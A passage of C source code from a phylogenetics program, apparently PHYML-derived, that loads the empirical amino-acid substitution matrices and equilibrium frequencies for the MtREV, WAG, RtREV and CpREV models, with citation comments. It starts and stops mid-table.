daa[16*20+ 4] = 42.00; daa[16*20+ 5] = 51.00; daa[16*20+ 6] = 32.00; daa[16*20+ 7] = 33.00;
daa[16*20+ 8] = 46.00; daa[16*20+ 9] = 245.00; daa[16*20+10] = 25.00; daa[16*20+11] = 103.00;
daa[16*20+12] = 226.00; daa[16*20+13] = 12.00; daa[16*20+14] = 118.00; daa[16*20+15] = 477.00;
daa[17*20+ 0] = 9.00; daa[17*20+ 1] = 126.00; daa[17*20+ 2] = 8.00; daa[17*20+ 3] = 4.00;
daa[17*20+ 4] = 115.00; daa[17*20+ 5] = 18.00; daa[17*20+ 6] = 10.00; daa[17*20+ 7] = 55.00;
daa[17*20+ 8] = 8.00; daa[17*20+ 9] = 9.00; daa[17*20+10] = 52.00; daa[17*20+11] = 10.00;
daa[17*20+12] = 24.00; daa[17*20+13] = 53.00; daa[17*20+14] = 6.00; daa[17*20+15] = 35.00;
daa[17*20+16] = 12.00; daa[18*20+ 0] = 11.00; daa[18*20+ 1] = 20.00; daa[18*20+ 2] = 70.00;
daa[18*20+ 3] = 46.00; daa[18*20+ 4] = 209.00; daa[18*20+ 5] = 24.00; daa[18*20+ 6] = 7.00;
daa[18*20+ 7] = 8.00; daa[18*20+ 8] = 573.00; daa[18*20+ 9] = 32.00; daa[18*20+10] = 24.00;
daa[18*20+11] = 8.00; daa[18*20+12] = 18.00; daa[18*20+13] = 536.00; daa[18*20+14] = 10.00;
daa[18*20+15] = 63.00; daa[18*20+16] = 21.00; daa[18*20+17] = 71.00; daa[19*20+ 0] = 298.00;
daa[19*20+ 1] = 17.00; daa[19*20+ 2] = 16.00; daa[19*20+ 3] = 31.00; daa[19*20+ 4] = 62.00;
daa[19*20+ 5] = 20.00; daa[19*20+ 6] = 45.00; daa[19*20+ 7] = 47.00; daa[19*20+ 8] = 11.00;
daa[19*20+ 9] = 961.00; daa[19*20+10] = 180.00; daa[19*20+11] = 14.00; daa[19*20+12] = 323.00;
daa[19*20+13] = 62.00; daa[19*20+14] = 23.00; daa[19*20+15] = 38.00; daa[19*20+16] = 112.00;
daa[19*20+17] = 25.00; daa[19*20+18] = 16.00;
/* mirror the lower triangle to make the matrix symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* equilibrium amino-acid frequencies */
pi[ 0] = 0.076748; pi[ 1] = 0.051691; pi[ 2] = 0.042645; pi[ 3] = 0.051544;
pi[ 4] = 0.019803; pi[ 5] = 0.040752; pi[ 6] = 0.061830; pi[ 7] = 0.073152;
pi[ 8] = 0.022944; pi[ 9] = 0.053761; pi[10] = 0.091904; pi[11] = 0.058676;
pi[12] = 0.023826; pi[13] = 0.040126; pi[14] = 0.050901; pi[15] = 0.068765;
pi[16] = 0.058565; pi[17] = 0.014261; pi[18] = 0.032102; pi[19] = 0.066005;
return 1;
}
/*********************************************************/
int Init_Qmat_MtREV(double *daa, double *pi)
{
/* Fill 'daa' (20x20, row-major) with the MtREV empirical amino-acid
 * exchangeability matrix: the lower triangle is written literally below
 * and then mirrored to the upper triangle. 'pi' receives the 20
 * equilibrium amino-acid frequencies. Always returns 1.
 * NOTE(review): no citation was given in the original source; this is
 * presumably the mitochondrial MtREV model of Adachi & Hasegawa (1996)
 * — confirm. Index order assumed to match the other Init_Qmat_* tables.
 */
int i,j,naa;
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[ 1*20+ 0] = 23.18; daa[ 2*20+ 0] = 26.95; daa[ 2*20+ 1] = 13.24; daa[ 3*20+ 0] = 17.67;
daa[ 3*20+ 1] = 1.90; daa[ 3*20+ 2] = 794.38; daa[ 4*20+ 0] = 59.93; daa[ 4*20+ 1] = 103.33;
daa[ 4*20+ 2] = 58.94; daa[ 4*20+ 3] = 1.90; daa[ 5*20+ 0] = 1.90; daa[ 5*20+ 1] = 220.99;
daa[ 5*20+ 2] = 173.56; daa[ 5*20+ 3] = 55.28; daa[ 5*20+ 4] = 75.24; daa[ 6*20+ 0] = 9.77;
daa[ 6*20+ 1] = 1.90; daa[ 6*20+ 2] = 63.05; daa[ 6*20+ 3] = 583.55; daa[ 6*20+ 4] = 1.90;
daa[ 6*20+ 5] = 313.56; daa[ 7*20+ 0] = 120.71; daa[ 7*20+ 1] = 23.03; daa[ 7*20+ 2] = 53.30;
daa[ 7*20+ 3] = 56.77; daa[ 7*20+ 4] = 30.71; daa[ 7*20+ 5] = 6.75; daa[ 7*20+ 6] = 28.28;
daa[ 8*20+ 0] = 13.90; daa[ 8*20+ 1] = 165.23; daa[ 8*20+ 2] = 496.13; daa[ 8*20+ 3] = 113.99;
daa[ 8*20+ 4] = 141.49; daa[ 8*20+ 5] = 582.40; daa[ 8*20+ 6] = 49.12; daa[ 8*20+ 7] = 1.90;
daa[ 9*20+ 0] = 96.49; daa[ 9*20+ 1] = 1.90; daa[ 9*20+ 2] = 27.10; daa[ 9*20+ 3] = 4.34;
daa[ 9*20+ 4] = 62.73; daa[ 9*20+ 5] = 8.34; daa[ 9*20+ 6] = 3.31; daa[ 9*20+ 7] = 5.98;
daa[ 9*20+ 8] = 12.26; daa[10*20+ 0] = 25.46; daa[10*20+ 1] = 15.58; daa[10*20+ 2] = 15.16;
daa[10*20+ 3] = 1.90; daa[10*20+ 4] = 25.65; daa[10*20+ 5] = 39.70; daa[10*20+ 6] = 1.90;
daa[10*20+ 7] = 2.41; daa[10*20+ 8] = 11.49; daa[10*20+ 9] = 329.09; daa[11*20+ 0] = 8.36;
daa[11*20+ 1] = 141.40; daa[11*20+ 2] = 608.70; daa[11*20+ 3] = 2.31; daa[11*20+ 4] = 1.90;
daa[11*20+ 5] = 465.58; daa[11*20+ 6] = 313.86; daa[11*20+ 7] = 22.73; daa[11*20+ 8] = 127.67;
daa[11*20+ 9] = 19.57; daa[11*20+10] = 14.88; daa[12*20+ 0] = 141.88; daa[12*20+ 1] = 1.90;
daa[12*20+ 2] = 65.41; daa[12*20+ 3] = 1.90; daa[12*20+ 4] = 6.18; daa[12*20+ 5] = 47.37;
daa[12*20+ 6] = 1.90; daa[12*20+ 7] = 1.90; daa[12*20+ 8] = 11.97; daa[12*20+ 9] = 517.98;
daa[12*20+10] = 537.53; daa[12*20+11] = 91.37; daa[13*20+ 0] = 6.37; daa[13*20+ 1] = 4.69;
daa[13*20+ 2] = 15.20; daa[13*20+ 3] = 4.98; daa[13*20+ 4] = 70.80; daa[13*20+ 5] = 19.11;
daa[13*20+ 6] = 2.67; daa[13*20+ 7] = 1.90; daa[13*20+ 8] = 48.16; daa[13*20+ 9] = 84.67;
daa[13*20+10] = 216.06; daa[13*20+11] = 6.44; daa[13*20+12] = 90.82; daa[14*20+ 0] = 54.31;
daa[14*20+ 1] = 23.64; daa[14*20+ 2] = 73.31; daa[14*20+ 3] = 13.43; daa[14*20+ 4] = 31.26;
daa[14*20+ 5] = 137.29; daa[14*20+ 6] = 12.83; daa[14*20+ 7] = 1.90; daa[14*20+ 8] = 60.97;
daa[14*20+ 9] = 20.63; daa[14*20+10] = 40.10; daa[14*20+11] = 50.10; daa[14*20+12] = 18.84;
daa[14*20+13] = 17.31; daa[15*20+ 0] = 387.86; daa[15*20+ 1] = 6.04; daa[15*20+ 2] = 494.39;
daa[15*20+ 3] = 69.02; daa[15*20+ 4] = 277.05; daa[15*20+ 5] = 54.11; daa[15*20+ 6] = 54.71;
daa[15*20+ 7] = 125.93; daa[15*20+ 8] = 77.46; daa[15*20+ 9] = 47.70; daa[15*20+10] = 73.61;
daa[15*20+11] = 105.79; daa[15*20+12] = 111.16; daa[15*20+13] = 64.29; daa[15*20+14] = 169.90;
daa[16*20+ 0] = 480.72; daa[16*20+ 1] = 2.08; daa[16*20+ 2] = 238.46; daa[16*20+ 3] = 28.01;
daa[16*20+ 4] = 179.97; daa[16*20+ 5] = 94.93; daa[16*20+ 6] = 14.82; daa[16*20+ 7] = 11.17;
daa[16*20+ 8] = 44.78; daa[16*20+ 9] = 368.43; daa[16*20+10] = 126.40; daa[16*20+11] = 136.33;
daa[16*20+12] = 528.17; daa[16*20+13] = 33.85; daa[16*20+14] = 128.22; daa[16*20+15] = 597.21;
daa[17*20+ 0] = 1.90; daa[17*20+ 1] = 21.95; daa[17*20+ 2] = 10.68; daa[17*20+ 3] = 19.86;
daa[17*20+ 4] = 33.60; daa[17*20+ 5] = 1.90; daa[17*20+ 6] = 1.90; daa[17*20+ 7] = 10.92;
daa[17*20+ 8] = 7.08; daa[17*20+ 9] = 1.90; daa[17*20+10] = 32.44; daa[17*20+11] = 24.00;
daa[17*20+12] = 21.71; daa[17*20+13] = 7.84; daa[17*20+14] = 4.21; daa[17*20+15] = 38.58;
daa[17*20+16] = 9.99; daa[18*20+ 0] = 6.48; daa[18*20+ 1] = 1.90; daa[18*20+ 2] = 191.36;
daa[18*20+ 3] = 21.21; daa[18*20+ 4] = 254.77; daa[18*20+ 5] = 38.82; daa[18*20+ 6] = 13.12;
daa[18*20+ 7] = 3.21; daa[18*20+ 8] = 670.14; daa[18*20+ 9] = 25.01; daa[18*20+10] = 44.15;
daa[18*20+11] = 51.17; daa[18*20+12] = 39.96; daa[18*20+13] = 465.58; daa[18*20+14] = 16.21;
daa[18*20+15] = 64.92; daa[18*20+16] = 38.73; daa[18*20+17] = 26.25; daa[19*20+ 0] = 195.06;
daa[19*20+ 1] = 7.64; daa[19*20+ 2] = 1.90; daa[19*20+ 3] = 1.90; daa[19*20+ 4] = 1.90;
daa[19*20+ 5] = 19.00; daa[19*20+ 6] = 21.14; daa[19*20+ 7] = 2.53; daa[19*20+ 8] = 1.90;
daa[19*20+ 9] = 1222.94; daa[19*20+10] = 91.67; daa[19*20+11] = 1.90; daa[19*20+12] = 387.54;
daa[19*20+13] = 6.35; daa[19*20+14] = 8.23; daa[19*20+15] = 1.90; daa[19*20+16] = 204.54;
daa[19*20+17] = 5.37; daa[19*20+18] = 1.90;
/* mirror the lower triangle to make the matrix symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* equilibrium amino-acid frequencies */
pi[ 0] = 0.072000; pi[ 1] = 0.019000; pi[ 2] = 0.039000; pi[ 3] = 0.019000;
pi[ 4] = 0.006000; pi[ 5] = 0.025000; pi[ 6] = 0.024000; pi[ 7] = 0.056000;
pi[ 8] = 0.028000; pi[ 9] = 0.088000; pi[10] = 0.169000; pi[11] = 0.023000;
pi[12] = 0.054000; pi[13] = 0.061000; pi[14] = 0.054000; pi[15] = 0.072000;
pi[16] = 0.086000; pi[17] = 0.029000; pi[18] = 0.033000; pi[19] = 0.043000;
return 1;
}
/*********************************************************/
/*
 * Init_Qmat_WAG
 *
 * Loads the WAG empirical amino-acid replacement model: the symmetric
 * exchangeability matrix into daa and the stationary frequencies into pi.
 *
 * daa : out; 20x20 matrix stored row-major (daa[i*20+j]). Only the strictly
 *       lower triangle is written explicitly; it is mirrored into the upper
 *       triangle below. The diagonal is left untouched here.
 * pi  : out; 20 equilibrium amino-acid frequencies.
 *
 * NOTE(review): the amino-acid index order is presumably the PAML/PHYML
 * convention (A R N D C Q E G H I L K M F P S T W Y V) — confirm against
 * the caller before relying on it.
 *
 * Always returns 1.
 */
int Init_Qmat_WAG(double *daa, double *pi)
{
int i,j,naa;
/* WAG's model data
* Simon Whelan and Nick Goldman
* 'A general empirical model of protein evolution derived from multiple
* protein families using a maximum-likelihood approach'
* MBE (2001) 18:691-699
*/
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[ 1*20+ 0] = 55.15710; daa[ 2*20+ 0] = 50.98480; daa[ 2*20+ 1] = 63.53460;
daa[ 3*20+ 0] = 73.89980; daa[ 3*20+ 1] = 14.73040; daa[ 3*20+ 2] = 542.94200;
daa[ 4*20+ 0] = 102.70400; daa[ 4*20+ 1] = 52.81910; daa[ 4*20+ 2] = 26.52560;
daa[ 4*20+ 3] = 3.02949; daa[ 5*20+ 0] = 90.85980; daa[ 5*20+ 1] = 303.55000;
daa[ 5*20+ 2] = 154.36400; daa[ 5*20+ 3] = 61.67830; daa[ 5*20+ 4] = 9.88179;
daa[ 6*20+ 0] = 158.28500; daa[ 6*20+ 1] = 43.91570; daa[ 6*20+ 2] = 94.71980;
daa[ 6*20+ 3] = 617.41600; daa[ 6*20+ 4] = 2.13520; daa[ 6*20+ 5] = 546.94700;
daa[ 7*20+ 0] = 141.67200; daa[ 7*20+ 1] = 58.46650; daa[ 7*20+ 2] = 112.55600;
daa[ 7*20+ 3] = 86.55840; daa[ 7*20+ 4] = 30.66740; daa[ 7*20+ 5] = 33.00520;
daa[ 7*20+ 6] = 56.77170; daa[ 8*20+ 0] = 31.69540; daa[ 8*20+ 1] = 213.71500;
daa[ 8*20+ 2] = 395.62900; daa[ 8*20+ 3] = 93.06760; daa[ 8*20+ 4] = 24.89720;
daa[ 8*20+ 5] = 429.41100; daa[ 8*20+ 6] = 57.00250; daa[ 8*20+ 7] = 24.94100;
daa[ 9*20+ 0] = 19.33350; daa[ 9*20+ 1] = 18.69790; daa[ 9*20+ 2] = 55.42360;
daa[ 9*20+ 3] = 3.94370; daa[ 9*20+ 4] = 17.01350; daa[ 9*20+ 5] = 11.39170;
daa[ 9*20+ 6] = 12.73950; daa[ 9*20+ 7] = 3.04501; daa[ 9*20+ 8] = 13.81900;
daa[10*20+ 0] = 39.79150; daa[10*20+ 1] = 49.76710; daa[10*20+ 2] = 13.15280;
daa[10*20+ 3] = 8.48047; daa[10*20+ 4] = 38.42870; daa[10*20+ 5] = 86.94890;
daa[10*20+ 6] = 15.42630; daa[10*20+ 7] = 6.13037; daa[10*20+ 8] = 49.94620;
daa[10*20+ 9] = 317.09700; daa[11*20+ 0] = 90.62650; daa[11*20+ 1] = 535.14200;
daa[11*20+ 2] = 301.20100; daa[11*20+ 3] = 47.98550; daa[11*20+ 4] = 7.40339;
daa[11*20+ 5] = 389.49000; daa[11*20+ 6] = 258.44300; daa[11*20+ 7] = 37.35580;
daa[11*20+ 8] = 89.04320; daa[11*20+ 9] = 32.38320; daa[11*20+10] = 25.75550;
daa[12*20+ 0] = 89.34960; daa[12*20+ 1] = 68.31620; daa[12*20+ 2] = 19.82210;
daa[12*20+ 3] = 10.37540; daa[12*20+ 4] = 39.04820; daa[12*20+ 5] = 154.52600;
daa[12*20+ 6] = 31.51240; daa[12*20+ 7] = 17.41000; daa[12*20+ 8] = 40.41410;
daa[12*20+ 9] = 425.74600; daa[12*20+10] = 485.40200; daa[12*20+11] = 93.42760;
daa[13*20+ 0] = 21.04940; daa[13*20+ 1] = 10.27110; daa[13*20+ 2] = 9.61621;
daa[13*20+ 3] = 4.67304; daa[13*20+ 4] = 39.80200; daa[13*20+ 5] = 9.99208;
daa[13*20+ 6] = 8.11339; daa[13*20+ 7] = 4.99310; daa[13*20+ 8] = 67.93710;
daa[13*20+ 9] = 105.94700; daa[13*20+10] = 211.51700; daa[13*20+11] = 8.88360;
daa[13*20+12] = 119.06300; daa[14*20+ 0] = 143.85500; daa[14*20+ 1] = 67.94890;
daa[14*20+ 2] = 19.50810; daa[14*20+ 3] = 42.39840; daa[14*20+ 4] = 10.94040;
daa[14*20+ 5] = 93.33720; daa[14*20+ 6] = 68.23550; daa[14*20+ 7] = 24.35700;
daa[14*20+ 8] = 69.61980; daa[14*20+ 9] = 9.99288; daa[14*20+10] = 41.58440;
daa[14*20+11] = 55.68960; daa[14*20+12] = 17.13290; daa[14*20+13] = 16.14440;
daa[15*20+ 0] = 337.07900; daa[15*20+ 1] = 122.41900; daa[15*20+ 2] = 397.42300;
daa[15*20+ 3] = 107.17600; daa[15*20+ 4] = 140.76600; daa[15*20+ 5] = 102.88700;
daa[15*20+ 6] = 70.49390; daa[15*20+ 7] = 134.18200; daa[15*20+ 8] = 74.01690;
daa[15*20+ 9] = 31.94400; daa[15*20+10] = 34.47390; daa[15*20+11] = 96.71300;
daa[15*20+12] = 49.39050; daa[15*20+13] = 54.59310; daa[15*20+14] = 161.32800;
daa[16*20+ 0] = 212.11100; daa[16*20+ 1] = 55.44130; daa[16*20+ 2] = 203.00600;
daa[16*20+ 3] = 37.48660; daa[16*20+ 4] = 51.29840; daa[16*20+ 5] = 85.79280;
daa[16*20+ 6] = 82.27650; daa[16*20+ 7] = 22.58330; daa[16*20+ 8] = 47.33070;
daa[16*20+ 9] = 145.81600; daa[16*20+10] = 32.66220; daa[16*20+11] = 138.69800;
daa[16*20+12] = 151.61200; daa[16*20+13] = 17.19030; daa[16*20+14] = 79.53840;
daa[16*20+15] = 437.80200; daa[17*20+ 0] = 11.31330; daa[17*20+ 1] = 116.39200;
daa[17*20+ 2] = 7.19167; daa[17*20+ 3] = 12.97670; daa[17*20+ 4] = 71.70700;
daa[17*20+ 5] = 21.57370; daa[17*20+ 6] = 15.65570; daa[17*20+ 7] = 33.69830;
daa[17*20+ 8] = 26.25690; daa[17*20+ 9] = 21.24830; daa[17*20+10] = 66.53090;
daa[17*20+11] = 13.75050; daa[17*20+12] = 51.57060; daa[17*20+13] = 152.96400;
daa[17*20+14] = 13.94050; daa[17*20+15] = 52.37420; daa[17*20+16] = 11.08640;
daa[18*20+ 0] = 24.07350; daa[18*20+ 1] = 38.15330; daa[18*20+ 2] = 108.60000;
daa[18*20+ 3] = 32.57110; daa[18*20+ 4] = 54.38330; daa[18*20+ 5] = 22.77100;
daa[18*20+ 6] = 19.63030; daa[18*20+ 7] = 10.36040; daa[18*20+ 8] = 387.34400;
daa[18*20+ 9] = 42.01700; daa[18*20+10] = 39.86180; daa[18*20+11] = 13.32640;
daa[18*20+12] = 42.84370; daa[18*20+13] = 645.42800; daa[18*20+14] = 21.60460;
daa[18*20+15] = 78.69930; daa[18*20+16] = 29.11480; daa[18*20+17] = 248.53900;
daa[19*20+ 0] = 200.60100; daa[19*20+ 1] = 25.18490; daa[19*20+ 2] = 19.62460;
daa[19*20+ 3] = 15.23350; daa[19*20+ 4] = 100.21400; daa[19*20+ 5] = 30.12810;
daa[19*20+ 6] = 58.87310; daa[19*20+ 7] = 18.72470; daa[19*20+ 8] = 11.83580;
daa[19*20+ 9] = 782.13000; daa[19*20+10] = 180.03400; daa[19*20+11] = 30.54340;
daa[19*20+12] = 205.84500; daa[19*20+13] = 64.98920; daa[19*20+14] = 31.48870;
daa[19*20+15] = 23.27390; daa[19*20+16] = 138.82300; daa[19*20+17] = 36.53690;
daa[19*20+18] = 31.47300;
/* mirror the lower triangle into the upper triangle: daa is symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* stationary (equilibrium) amino-acid frequencies */
pi[0] = 0.0866279; pi[1] = 0.043972; pi[2] = 0.0390894; pi[3] = 0.0570451;
pi[4] = 0.0193078; pi[5] = 0.0367281; pi[6] = 0.0580589; pi[7] = 0.0832518;
pi[8] = 0.0244313; pi[9] = 0.048466; pi[10] = 0.086209; pi[11] = 0.0620286;
pi[12] = 0.0195027; pi[13] = 0.0384319; pi[14] = 0.0457631; pi[15] = 0.0695179;
pi[16] = 0.0610127; pi[17] = 0.0143859; pi[18] = 0.0352742; pi[19] = 0.0708956;
return 1;
}
/*********************************************************/
/*
 * Init_Qmat_RtREV
 *
 * Loads the RtREV empirical amino-acid replacement model (derived from
 * retrovirus / reverse-transcriptase alignments): exchangeabilities into
 * daa and stationary frequencies into pi.
 *
 * daa : out; 20x20 row-major matrix. Only the strictly lower triangle is
 *       written, then mirrored into the upper triangle (symmetric matrix).
 * pi  : out; 20 equilibrium amino-acid frequencies.
 *
 * NOTE(review): amino-acid index order presumably follows the PAML/PHYML
 * convention (A R N D C Q E G H I L K M F P S T W Y V) — confirm against
 * the caller.
 *
 * Always returns 1.
 */
int Init_Qmat_RtREV(double *daa, double *pi)
{
/*
This model has been 'translated' from John Huelsenbeck and Fredrik Ronquist
MrBayes program into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Dimmic M.W., J.S. Rest, D.P. Mindell, and D. Goldstein. 2002. RArtREV:
An amino acid substitution matrix for inference of retrovirus and
reverse transcriptase phylogeny. Journal of Molecular Evolution
55: 65-73.
*/
int i,j,naa;
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[1*20+0]= 34; daa[2*20+0]= 51; daa[2*20+1]= 35; daa[3*20+0]= 10;
daa[3*20+1]= 30; daa[3*20+2]= 384; daa[4*20+0]= 439; daa[4*20+1]= 92;
daa[4*20+2]= 128; daa[4*20+3]= 1; daa[5*20+0]= 32; daa[5*20+1]= 221;
daa[5*20+2]= 236; daa[5*20+3]= 78; daa[5*20+4]= 70; daa[6*20+0]= 81;
daa[6*20+1]= 10; daa[6*20+2]= 79; daa[6*20+3]= 542; daa[6*20+4]= 1;
daa[6*20+5]= 372; daa[7*20+0]= 135; daa[7*20+1]= 41; daa[7*20+2]= 94;
daa[7*20+3]= 61; daa[7*20+4]= 48; daa[7*20+5]= 18; daa[7*20+6]= 70;
daa[8*20+0]= 30; daa[8*20+1]= 90; daa[8*20+2]= 320; daa[8*20+3]= 91;
daa[8*20+4]= 124; daa[8*20+5]= 387; daa[8*20+6]= 34; daa[8*20+7]= 68;
daa[9*20+0]= 1; daa[9*20+1]= 24; daa[9*20+2]= 35; daa[9*20+3]= 1;
daa[9*20+4]= 104; daa[9*20+5]= 33; daa[9*20+6]= 1; daa[9*20+7]= 1;
daa[9*20+8]= 34; daa[10*20+0]= 45; daa[10*20+1]= 18; daa[10*20+2]= 15;
daa[10*20+3]= 5; daa[10*20+4]= 110; daa[10*20+5]= 54; daa[10*20+6]= 21;
daa[10*20+7]= 3; daa[10*20+8]= 51; daa[10*20+9]= 385; daa[11*20+0]= 38;
daa[11*20+1]= 593; daa[11*20+2]= 123; daa[11*20+3]= 20; daa[11*20+4]= 16;
daa[11*20+5]= 309; daa[11*20+6]= 141; daa[11*20+7]= 30; daa[11*20+8]= 76;
daa[11*20+9]= 34; daa[11*20+10]= 23; daa[12*20+0]= 235; daa[12*20+1]= 57;
daa[12*20+2]= 1; daa[12*20+3]= 1; daa[12*20+4]= 156; daa[12*20+5]= 158;
daa[12*20+6]= 1; daa[12*20+7]= 37; daa[12*20+8]= 116; daa[12*20+9]= 375;
daa[12*20+10]= 581; daa[12*20+11]= 134; daa[13*20+0]= 1; daa[13*20+1]= 7;
daa[13*20+2]= 49; daa[13*20+3]= 1; daa[13*20+4]= 70; daa[13*20+5]= 1;
daa[13*20+6]= 1; daa[13*20+7]= 7; daa[13*20+8]= 141; daa[13*20+9]= 64;
daa[13*20+10]= 179; daa[13*20+11]= 14; daa[13*20+12]= 247; daa[14*20+0]= 97;
daa[14*20+1]= 24; daa[14*20+2]= 33; daa[14*20+3]= 55; daa[14*20+4]= 1;
daa[14*20+5]= 68; daa[14*20+6]= 52; daa[14*20+7]= 17; daa[14*20+8]= 44;
daa[14*20+9]= 10; daa[14*20+10]= 22; daa[14*20+11]= 43; daa[14*20+12]= 1;
daa[14*20+13]= 11; daa[15*20+0]= 460; daa[15*20+1]= 102; daa[15*20+2]= 294;
daa[15*20+3]= 136; daa[15*20+4]= 75; daa[15*20+5]= 225; daa[15*20+6]= 95;
daa[15*20+7]= 152; daa[15*20+8]= 183; daa[15*20+9]= 4; daa[15*20+10]= 24;
daa[15*20+11]= 77; daa[15*20+12]= 1; daa[15*20+13]= 20; daa[15*20+14]= 134;
daa[16*20+0]= 258; daa[16*20+1]= 64; daa[16*20+2]= 148; daa[16*20+3]= 55;
daa[16*20+4]= 117; daa[16*20+5]= 146; daa[16*20+6]= 82; daa[16*20+7]= 7;
daa[16*20+8]= 49; daa[16*20+9]= 72; daa[16*20+10]= 25; daa[16*20+11]= 110;
daa[16*20+12]= 131; daa[16*20+13]= 69; daa[16*20+14]= 62; daa[16*20+15]= 671;
daa[17*20+0]= 5; daa[17*20+1]= 13; daa[17*20+2]= 16; daa[17*20+3]= 1;
daa[17*20+4]= 55; daa[17*20+5]= 10; daa[17*20+6]= 17; daa[17*20+7]= 23;
daa[17*20+8]= 48; daa[17*20+9]= 39; daa[17*20+10]= 47; daa[17*20+11]= 6;
daa[17*20+12]= 111; daa[17*20+13]= 182; daa[17*20+14]= 9; daa[17*20+15]= 14;
daa[17*20+16]= 1; daa[18*20+0]= 55; daa[18*20+1]= 47; daa[18*20+2]= 28;
daa[18*20+3]= 1; daa[18*20+4]= 131; daa[18*20+5]= 45; daa[18*20+6]= 1;
daa[18*20+7]= 21; daa[18*20+8]= 307; daa[18*20+9]= 26; daa[18*20+10]= 64;
daa[18*20+11]= 1; daa[18*20+12]= 74; daa[18*20+13]= 1017; daa[18*20+14]= 14;
daa[18*20+15]= 31; daa[18*20+16]= 34; daa[18*20+17]= 176; daa[19*20+0]= 197;
daa[19*20+1]= 29; daa[19*20+2]= 21; daa[19*20+3]= 6; daa[19*20+4]= 295;
daa[19*20+5]= 36; daa[19*20+6]= 35; daa[19*20+7]= 3; daa[19*20+8]= 1;
daa[19*20+9]= 1048; daa[19*20+10]= 112; daa[19*20+11]= 19; daa[19*20+12]= 236;
daa[19*20+13]= 92; daa[19*20+14]= 25; daa[19*20+15]= 39; daa[19*20+16]= 196;
daa[19*20+17]= 26; daa[19*20+18]= 59;
/* mirror the lower triangle into the upper triangle: daa is symmetric */
for (i=0; i<naa; i++) for (j=0; j<i; j++) daa[j*naa+i] = daa[i*naa+j];
/* stationary (equilibrium) amino-acid frequencies */
pi[0]= 0.0646; pi[1]= 0.0453; pi[2]= 0.0376; pi[3]= 0.0422;
pi[4]= 0.0114; pi[5]= 0.0606; pi[6]= 0.0607; pi[7]= 0.0639;
pi[8]= 0.0273; pi[9]= 0.0679; pi[10]= 0.1018; pi[11]= 0.0751;
pi[12]= 0.015; pi[13]= 0.0287; pi[14]= 0.0681; pi[15]= 0.0488;
pi[16]= 0.0622; pi[17]= 0.0251; pi[18]= 0.0318; pi[19]= 0.0619;
return 1;
}
/*********************************************************/
/*
 * Init_Qmat_CpREV
 *
 * Loads the CpREV empirical amino-acid replacement model (estimated from
 * chloroplast-encoded proteins): exchangeabilities into daa and stationary
 * frequencies into pi.
 *
 * daa : out; 20x20 row-major matrix. Only the strictly lower triangle is
 *       written, then mirrored into the upper triangle (symmetric matrix).
 * pi  : out; 20 equilibrium amino-acid frequencies.
 *
 * NOTE(review): amino-acid index order presumably follows the PAML/PHYML
 * convention (A R N D C Q E G H I L K M F P S T W Y V) — confirm against
 * the caller.
 *
 * Always returns 1.
 */
int Init_Qmat_CpREV(double *daa, double *pi)
{
/*
This model has been 'translated' from John Huelsenbeck and Fredrik Ronquist
MrBayes program into PHYML format by Federico Abascal. Many thanks to them.
*/
/*
Adachi, J., P. Waddell, W. Martin, and M. Hasegawa. 2000. Plastid
genome phylogeny and a model of amino acid substitution for proteins
encoded by chloroplast DNA. Journal of Molecular Evolution
50:348-358.
*/
int i,j,naa;
naa = 20;
/* lower triangle of the symmetric exchangeability matrix */
daa[1*20+0]= 105; daa[2*20+0]= 227; daa[2*20+1]= 357; daa[3*20+0]= 175;
daa[3*20+1]= 43; daa[3*20+2]= 4435; daa[4*20+0]= 669; daa[4*20+1]= 823;
daa[4*20+2]= 538; daa[4*20+3]= 10; daa[5*20+0]= 157; daa[5*20+1]= 1745;
daa[5*20+2]= 768; daa[5*20+3]= 400; daa[5*20+4]= 10; daa[6*20+0]= 499;
daa[6*20+1]= 152; daa[6*20+2]= 1055; daa[6*20+3]= 3691; daa[6*20+4]= 10;
daa[6*20+5]= 3122; daa[7*20+0]= 665; daa[7*20+1]= 243; daa[7*20+2]= 653;
daa[7*20+3]= 431; daa[7*20+4]= 303; daa[7*20+5]= 133; daa[7*20+6]= 379;
daa[8*20+0]= 66; daa[8*20+1]= 715; daa[8*20+2]= 1405; daa[8*20+3]= 331;
daa[8*20+4]= 441; daa[8*20+5]= 1269; daa[8*20+6]= 162; daa[8*20+7]= 19;
daa[9*20+0]= 145; daa[9*20+1]= 136; daa[9*20+2]= 168; daa[9*20+3]= 10;
daa[9*20+4]= 280; daa[9*20+5]= 92; daa[9*20+6]= 148; daa[9*20+7]= 40;
daa[9*20+8]= 29; daa[10*20+0]= 197; daa[10*20+1]= 203; daa[10*20+2]= 113;
daa[10*20+3]= 10; daa[10*20+4]= 396; daa[10*20+5]= 286; daa[10*20+6]= 82;
daa[10*20+7]= 20; daa[10*20+8]= 66; daa[10*20+9]= 1745; daa[11*20+0]= 236;
daa[11*20+1]= 4482; daa[11*20+2]= 2430; daa[11*20+3]= 412; daa[11*20+4]= 48;
daa[11*20+5]= 3313; daa[11*20+6]= 2629; daa[11*20+7]= 263; daa[11*20+8]= 305;
daa[11*20+9]= 345; daa[11*20+10]= 218; daa[12*20+0]= 185; daa[12*20+1]= 125;
daa[12*20+2]= 61; daa[12*20+3]= 47; daa[12*20+4]= 159; daa[12*20+5]= 202;
daa[12*20+6]= 113; daa[12*20+7]= 21; daa[12*20+8]= 10; daa[12*20+9]= 1772;
daa[12*20+10]= 1351; daa[12*20+11]= 193; daa[13*20+0]= 68; daa[13*20+1]= 53;
daa[13*20+2]= 97; daa[13*20+3]= 22; daa[13*20+4]= 726; daa[13*20+5]= 10;
daa[13*20+6]= 145; daa[13*20+7]= 25; daa[13*20+8]= 127; daa[13*20+9]= 454;
daa[13*20+10]= 1268; daa[13*20+11]= 72; daa[13*20+12]= 327; daa[14*20+0]= 490;
daa[14*20+1]= 87; daa[14*20+2]= 173; daa[14*20+3]= 170; daa[14*20+4]= 285;
daa[14*20+5]= 323; daa[14*20+6]= 185; daa[14*20+7]= 28; daa[14*20+8]= 152;
daa[14*20+9]= 117; daa[14*20+10]= 219; daa[14*20+11]= 302; daa[14*20+12]= 100;
